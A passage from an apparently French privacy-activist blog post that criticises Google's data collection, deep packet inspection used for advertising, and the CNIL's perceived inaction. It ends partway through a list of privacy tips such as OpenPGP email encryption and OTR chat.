L’auteur de ce même billet est également  parfaitement inconscient  en terme de mesure du danger de l’exploitation des données personnelles : Je cite “Je ne surfe pas sur des sites pédophiles ou illicites. Même si je surfe sur des sites porno, ce n’est pas illégal  que je sache, alors google peut toujours m’espionner.” Gageons que l’auteur apprécierait que sa femme recoive des catalogues de sextoys par la Poste parce que ce dernier est passé devant un sex shop. Je dis bien devant… je ne parle même pas de rentrer, nous allons y revenir avec le Deep Packet Inspection.

 

Un chiffre devrait commencer à vous faire réfléchir. Aujourd’hui Facebook serait cité dans un cas de divorce sur trois au Royaume-Uni. Le caractère intrusif et l’aspect un peu “mouchard” des réseaux sociaux est indéniable et il arrive forcément, un jour, où ceci a un impact, direct ou indirect sur votre vie… même au bistrot !

 

Un autre point, bien connu des techniciens, c’est celui de la publicité contextuelle en temps réel lorsque vous utilisez la messagerie Gmail à partir de l’interface de Google. Quand vous écrivez un mail à votre compagne pour lui demander où elle souhaite partir en vacance et que vous voyez apparaitre alors même que vous composez le message, des publicités pour des séjours tout compris en Tunisie, SVP, ne croyez pas un instant qu’il s’agisse la de hasard. Techniquement, Google lit vos emails pour vous renvoyer une publicité contextualisée. Dans cet article traitant également de la vie privée et des pratiques des publicitaires utilisant ces technologies d’inspection en profondeur des paquets (Deep Packet Inspection) à des fins publicitaires, souvent hors de tout controle (à priori pas en France, mais on va y revenir…), je m’étais insurgé contre cette pratique.

 

La CNIL ? … et pourquoi pas le père Noel ?

Je suis en France tout va bien j’échappe à ces pratiques, la CNIL me protège“… monumentale erreur !

La CNIL cautionne parfaitement cette pratique pourtant par définition assimilable à du viol de correspondance privée, en l’encadrant cependant semble t-il de manière très stricte… voir l’expérimentation Orange Préférences et une représentante de la CNIL en faire la promotion à la radio sans nommer ni Orange ni la technologie en question.

 

Mais si la CNIL a pu encadrer Orange en exigeant certaines garanties sur la collecte, le traitement et l’exploitation des données analysées dans le cadre d’Orange Préférences, il n’en va pas du tout de même pour des entreprises non françaises. Et devinez qui on retrouve au coeur d’une expérimentation de ce type ? … Google ! Le service se nomme Google Screenwise, et comme pour Orange Préférences, il se fait sur Opt-In. Si Google rémunère les utilisateurs qui acceptent de se faire violer un peu plus leur vie privée, Google n’avoue pas publiquement utiliser de l’inspection en profondeur de paquets. Une lecture attentive des termes d’utilisation de ce service nous a permis de mettre en évidence un élément particulièrement inquiétant, par l’intermédiaire de GFK, partenaire de Google sur cette opération qui n’est autre qu’un actionnaire de Qosmos une entreprise française, qui est l’un des leaders mondiaux du Deep Packet Inspection. Avant de vous laisser séduire par Screenwise, de grâce lisez cet article. Et la CNIL, concernant Screenwise… on ne l’a pas entendu.

 

Enfin, il faut savoir qu’il n’est nul besoin de délivrer un service en France, et donc d’être soumis à nos lois restrictives en matière de protection de la vie privée, pour opérer une écoute et une interception de vos données sur Internet. Ce petit schéma devrait vous éclairer sur le nombre important de points sur le réseau qui permettent à des publicitaires, en dehors de tout contrôle, d’espionner votre activité sur Internet pour vous proposer de la publicité contextuelle ou collecter ces données à des fins de revente à des tiers.

 

Ne serait-ce qu’au niveau français, on ne peut pas dire que la CNIL fasse preuve de zèle. Il est naturel de l’entendre de temps en temps s’exprimer contre de “gros acteurs”, c’est toujours bon en terme de communication et ça justifie les budgets. Il est en revanche bien plus rare de voir la CNIL monter au créneau pour des affaires pourtant très grave, comme cette énorme fuite de données à l’UMP où MesConseils, une petite entreprise visiblement peu qualifiée pour traiter des données personnelles, a eu l’idée grandiose de stocker sur des machines poubelles, des bases de données sensibles qui contenaient des mots de passe de parlementaires pour accéder à des applications du réseau de l’Assemblée Nationale ou du Sénat. A quoi servaient ces bases de données, comment ont elles pu se retrouvées gérées de manière aussi catastrophique ? … une fois de plus, la CNIL on ne l’a pas entendu.

 

La dernière foi que l’on a entendu la CNIL (et oui c’était encore à cause de nous)  se pencher sur un cas en France, c’est sur celui de TMG, dans le cadre de la procédure de riposte graduée de l’HADOPI. Et encore il y aurait encore énormément à en dire. Le rapport de la CNIL n’a pas été rendu public après que TMG ait été mis en demeure. Puis quelques semaines plus tard, dans une parfaite opacité, celle ci déclare que “maintenant c’est bon il n’y a plus de problème“… sans plus d’explication. L’HADOPI n’a pas été dupe n’a d’ailleurs, jusqu’à aujourd’hui encore, pas rétabli l’interconnexion entre son système et celui de TMG.

 

Conclusion … La CNIL, c’est bien mignon, mais ça ne sert pas à grand chose.Entendre la CNIL émettre des avis sur Google relève surtout du grand spectacle, mais sur le fond c’est relativement inintéressant. D’ailleurs Google lui a gentiment objecté une fin de non recevoir, lui expliquant que revenir en arrière créerait plus de confusion chez les utilisateurs qu’autre chose… ce qui est en pratique parfaitement vrai.

 

Plus sérieusement comment on fait ?

Ne pas être d’accord avec les règles de confidentialité de Google vous laisse en fait 3 alternatives.

  • Ne plus utiliser Google : une solution radicale, mais ne fera pour le coup aucune concession en matière de vie privée
  • Compter sur la CNIL pour qu’elle inflige une amende à Google : nous avons vu un peu plus haut que ce n’est certainement pas une amende qui changera un fait inhérent au pachydermique et incontournable Google. Nous avons également vu qu’il convient d’avoir une confiance toute relative en la CNIL attendu que celle-ci n’est déjà pas ultra réactive en France et que ce n’est surement pas pour des entreprises qui opèrent à l’étranger qu’elle sera techniquement et juridiquement compétente pour vous protéger.
  • Utiliser Google de la manière la plus anonymisée possible : il existe des manières, moyennant quelques sacrifices en terme de confort d’utilisation qui vous permettent de conserver un certain anonymat en utilisant les services de Google. Elles mériteraient elles aussi un billet à elles seules mais voici déjà quelques pistes très simples concernant l’utilisation du service de mail de Google :
  1. Préférer un client mail comme Thunderbird/enigmail, chiffrer ses emails avec OpenPGP.
  2. A la création du compte Gmail aller faire un tour dans les paramètres de son compte pour y désactiver l’archivage des conversations Gtalk (paramètres de votre compte mail sur l’interface de Google, puis onglet “chat”).
  3. Gtalk le chat de Google, qui est également un compte Jabber. Ceci veut dire qu’avec un client compatible comme Pidgin on peut avec ce compte parler de manière chiffrée grâce à l’extension OTR